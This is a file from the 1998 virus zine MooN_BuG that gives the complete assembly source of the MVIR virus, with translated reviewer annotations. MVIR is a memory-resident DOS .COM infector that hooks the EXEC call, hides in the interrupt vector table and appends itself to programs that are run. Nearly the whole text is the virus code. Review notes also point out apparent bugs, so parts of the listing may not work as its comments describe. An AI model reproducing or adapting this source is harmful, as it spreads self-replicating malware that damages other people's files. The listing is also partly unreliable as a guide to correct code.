[TulaAnti&ViralClub] PRESENTS ...
MooN_BuG, Issue 7, Sep 1998 file 010
Вирус MVIR (the MVIR virus — a memory-resident DOS .COM file infector; listing annotated for analysis)
by Unknown
=== Cut ==
; ---------------------------------------------------------------------------
; MVIR: DOS .COM appending infector, memory-resident at 0000:0200h, hooking
; INT 21h AH=4Bh (EXEC).  16-bit real mode, MASM/TASM syntax, .286 opcodes.
;
; Reviewer notes (code left byte-identical; comments translated and added):
;  * In an infected host the first 6 bytes are the `root` stub (end of file),
;    which jumps to the appended body with SI = the body's load offset.  The
;    body is assembled at ORG 200h, so every "offset X - 200h" below is X's
;    position relative to `start`, added to SI to address the loaded copy.
;  * The "decryption" loop is a byte-stride XOR with a 16-bit key.  With the
;    key 7F7Fh (taken when two PIT port reads agree) every interior byte is
;    XORed with 7Fh twice and is unchanged; only the byte at `start` (and the
;    byte 300h past it) is altered.  If the reads differ the entry value of
;    CX is used instead, which also rewrites the loop's own live code --
;    presumably an anti-emulation trip-wire.  TODO confirm on target hardware.
;  * Residency check and install both use segment 0: the 300-byte copy lands
;    on the interrupt vector table entries for INT 80h..CAh (0:200h..0:32Bh).
; ---------------------------------------------------------------------------
.286
codesg segment
assume cs:codesg
org 100h                            ; .COM image: entry at CS:100h, DS=ES=CS=PSP
begin:
mov si,offset start                 ; SI = 200h: where the body sits in this dropper
jmp si
db 7fh                              ; pad to 6 bytes, same shape as the `root` stub
;
; Host program body (in this dropper the 100h..200h gap is just padding)
;
org 200h
start:
; On entry SI = load offset of `start` in the current host (set by the stub)
add si,offset old_byte - 200h       ; SI -> saved host bytes inside this copy
; DS==ES==CS==PSP
;
mov di,0100h
mov cx,3                            ; restore the host's original 6 bytes at CS:100h
rep movsw                           ; (SI ends at old_byte+6)
in ax,42h                           ; two back-to-back reads of PIT ports 42h/43h
xchg ax,bx
in ax,42h
cmp ax,bx
jnz anti_done                       ; reads differ -> key = whatever CX held at entry
mov cx,7f7fh                        ; reads equal  -> key = 7F7Fh
anti_done:
mov ax,300h
xchg cx,ax                          ; CX = 300h loop count, AX = key
sub si,offset old_byte + 6 -200h    ; back to SI = load offset of `start`
push si
crypt:
xor word ptr ds:[si],ax             ; word XOR at every byte offset: byte k gets AH
inc si                              ;   (from step k-1) then AL (from step k)
loop crypt                          ; leaves CX = 0, reused as segment 0 below
; NOTE(review): with AL == AH only the byte at `start` changes (XORed once),
; and that changed byte is what gets installed at 0:200h and written into
; new hosts below.  It appears the next generation would not start with the
; original `add si` opcode -- verify before relying on this listing's flow.
;--------------------- Test present in memory --------------
pop si                              ; SI = load offset of `start`
mov ds,cx                           ; CX == 0 after the loop: DS = segment 0
cmp word ptr ds :[Virus_ID],'lO'    ; 0:Virus_ID == "Ol" -> already resident
je next
;--------------------- Move Virus Body ---------------------
push ds
push cs
pop ds                              ; DS = CS (this image), ES = 0 (popped below)
mov di,0200h
pop es
;es set to 0
mov cx,150                          ; Virus Size: 150 words = 300 bytes copied to
rep movsw                           ;   0000:0200h; must cover int_24h - start
; Save the old INT 21h vector inside the relocated body at 0:200h
;
push es
pop ds                              ; DS = 0
les bx,ds:[21h*4]                   ; ES:BX = current INT 21h vector from the IVT
mov word ptr ds:intold,bx           ; patch the far-jump target in the resident copy
mov word ptr ds:intold+2,es
mov dx,offset work_p                ; DS:DX = 0000:work_p
mov ax,2521h                        ; INT 21h AH=25h: point INT 21h at our handler
int 21h
next:
push cs
pop ds
push cs
pop es                              ; DS = ES = PSP again
mov di,100h
jmp di                              ; run the restored host from CS:100h
;---------- Saved original 6 bytes of the infected program ----------
old_byte:
db 90h,90h,90h, 90h,90h,0c3h        ; in the dropper: NOPs + RET (exit to DOS)
;------------------ Main part of virus ---------------------
; Resident INT 21h handler, running at 0000:work_p.  Intercepts AX=4B00h
; (EXEC: load and run) and tries to infect the program named by DS:DX before
; chaining to the original handler through the far jump patched at `intold`.
; AX,BX,CX,DX,ES,DS and flags are preserved around vmain; vmain/setfilep do
; not touch SI, DI or BP, so those need no save.
work_p:
Pushf
cmp ax,4b00h
jne oldint                          ; not EXEC: pass straight through
push ax
push bx
push cx
push dx
push es
push ds
call vmain                          ; DS:DX = ASCIIZ path of the program being run
pop ds
pop es
pop dx
pop cx
pop bx
pop ax
oldint:
Popf
db 0eah                             ; JMP FAR opcode; operand filled in at install
intold dd 0                         ; original INT 21h vector (offset:segment)
;------------------------
; vmain: infect the file named by DS:DX (the EXEC target).
; In:   DS:DX = ASCIIZ path from the intercepted INT 21h call; CS = 0.
; Out:  nothing meaningful.  Clobbers AX,BX,CX,DX,DS,ES.
; Side effects: points INT 24h at `iret_pointer` while the file is open so
;   critical errors are failed silently, and restores it on every exit path.
;   Appends the resident body (0:200h .. int_24h) and overwrites the file's
;   first 6 bytes with the `root` stub.  Skips 'MZ' files, files already
;   carrying the stub, and files <= 1220 bytes.  No timestamp or attribute
;   handling is visible in this listing.
vmain proc
mov ax,3524h                        ; get INT 24h (critical error) vector -> ES:BX
int 21h
mov word ptr cs:int_24h,bx
mov word ptr cs:int_24h+2,es
;-------------- Open file ----------------------------------
mov ax,word ptr cs:[offset ax_3d02h - offset start +200h]   ; == cs:[ax_3d02h], start = 200h
; AX = 3D02h (open read/write) fetched from data rather than an immediate,
; presumably to keep the literal out of the code bytes.
int 21h                             ; DS:DX is still the caller's file name
jc exitv
XCHG bx,ax                          ; BX = file handle
push cs
pop ds                              ; DS = 0
mov dx,offset iret_pointer
mov ax,2524h                        ; INT 24h := our "fail the operation" handler
int 21h
; Read first 6 bytes of program
mov ah,3fh                          ; BX: file handle
; ds set to 0
mov dx,offset old_byte              ; into old_byte of the resident copy
mov cx,6
int 21h
CMP WORD PTR ds:[offset old_byte],'ZM'      ; 'MZ' header -> EXE, leave alone
je close
cmp word ptr ds:[offset old_byte+3],0e6ffh  ; bytes FF E6 = `jmp si` of the stub
je close                            ;   at offset 3 -> already infected
mov al,2                            ; seek to end of file; AX = low word of size
call setfilep
jc exitv
cmp ax,1220
jbe close                           ; skip files <= 1220 bytes
add ax,100h                         ; load offset of the body once appended
; NOTE(review): only the low word of the size is used (DX ignored) and there
; is no upper bound, so a large .COM wraps here and gets a bad stub target.
mov word ptr offset ds:root +1,ax   ; patch imm16 of `mov si,...` in the stub
mov dx,200h                         ; DS:DX = 0:200h, the resident body
mov cx,offset int_24h - offset start    ; body length
mov ah,byte ptr ds:[offset ah_40h - offset start +200h]   ; AH = 40h (write)
int 21h
; The written body includes old_byte, i.e. the host's
jc exitv                            ; original 6 bytes
; NOTE(review): the check below compares CX (the requested length, which DOS
; leaves unchanged) with the same constant, so it is always equal.  The count
; actually written is returned in AX; a short write (disk full) is not
; detected and the stub is still installed, corrupting the host.
cmp cx,offset int_24h - offset start ;
jne exitv
;--------------- Add virus boot ----------------------------
sub al,al                           ; seek to offset 0
call setfilep
jc exitv
mov cx,6
mov dx,offset root                  ; write the 6-byte loader stub over the header
mov ah,byte ptr ds:[offset ah_40h - offset start +200h]
int 21h                             ; result not checked
;--------------- Close file --------------------------------
close:
mov ah,3eh
int 21h
exitv:
lds dx,cs:[int_24h]                 ; restore the saved INT 24h vector
mov ax,2524h
int 21h
ret
vmain endp
; setfilep: INT 21h AH=42h, move the file pointer to offset 0 from origin AL.
; In:  BX = handle, AL = origin (callers pass 0 = start, 2 = end).
; Out: DX:AX = new position, CF set on error.  Clobbers AH,CX,DX.
setfilep proc
mov ah,42h
sub cx,cx
sub dx,dx                           ; CX:DX = 0 offset
int 21h
ret
setfilep endp
Virus_ID db 'Ol'                    ; residency marker, tested at 0:Virus_ID as word 'lO'
Num_EXEC db 0                       ; not referenced anywhere in this listing
; INT 24h (critical error) handler installed while the target file is open.
iret_pointer:
mov al,3                            ; AL=3: tell DOS to fail the call, so no
iret                                ;   "Abort, Retry, Fail?" prompt appears
ah_40h db 40h                       ; Write  } DOS function numbers kept as data and
ax_3d02h dw 3d02h                   ; Open   } loaded via memory in vmain, presumably
                                    ;        } to keep the immediates out of the code
;================= Virus loader stub (written over the host's first 6 bytes) ====
; `mov si,imm16` (3 bytes; imm16 is patched by vmain to file size + 100h),
; `jmp si` (FF E6, 2 bytes -- also the infection marker), one pad byte.
root:
mov si,offset old_byte              ; placeholder operand; patched before writing
jmp si
db 7fh
;===========================================================
int_24h dd 0                        ; saved INT 24h vector; first byte past the
                                    ;   written body (length = int_24h - start)
codesg ends
end begin                           ; entry point = begin (dropper stub at 100h)
=== Cut ==